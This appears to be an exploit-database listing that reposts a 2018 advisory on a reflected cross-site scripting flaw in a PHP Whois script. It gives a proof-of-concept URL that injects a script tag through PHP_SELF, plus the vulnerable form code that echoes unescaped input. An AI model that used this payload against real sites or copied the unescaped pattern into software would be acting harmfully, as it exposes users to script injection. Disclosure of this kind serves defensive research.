Advertisement






PHP Whois Script Cross Site Scripting Vulnerability

CVE Category Price Severity
N/A CWE-79 N/A Medium
Author Risk Exploitation Type Date
N/A Medium Remote 2018-07-18
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070178

Below is a copy:

PHP Whois Script Cross Site Scripting Vulnerability
[+] Exploit Title ; PHP Whois Script Cross Site Scripting Vulnerability

[+] Date : 2018-07-18

[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS

[+] Vendor Homepage : https://www.hscripts.com/scripts/php/whois.php

[+] Dork : ...

[+] My Site : http://4rtxtnk7o5yt3mfw.onion/

[+] Tested On : windows 10 - kali linux 2.0

[+] Contact : https://telegram.me/WebServer

[+] Description :

[!]Script is intended to check the availability of domains and also fetches the complete information about your domain or IP.

[+] Poc : 

[!] localhost/phpwhois/index.php/"><script>alert('0P3N3R')</script>

[+] Type of vulnerability :

[!] Xss -> Reflected - > PHP_SELF

[+] Vulnerable Source Code :

[!] <form action="<?=$_SERVER['PHP_SELF'];?>">
<p><b><label for="domain">Domain/IP Address:</label></b>
<input type="text" name="domain" id="domain" value="<?=$domain;?>">
<input type="submit" value="whois"></p>
</form>


[+] Security Level :

[!] medium

[+] Exploitation Technique:

[!] Remote

[+] Request Method :

[!] GET

[+] Vulnerability Files :

[!] index.php

[+] Fix :

[!] Restrict user input or replace bad characters



[+] We Are : [+] 0P3N3R [+] Ebrahim_Vaker

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum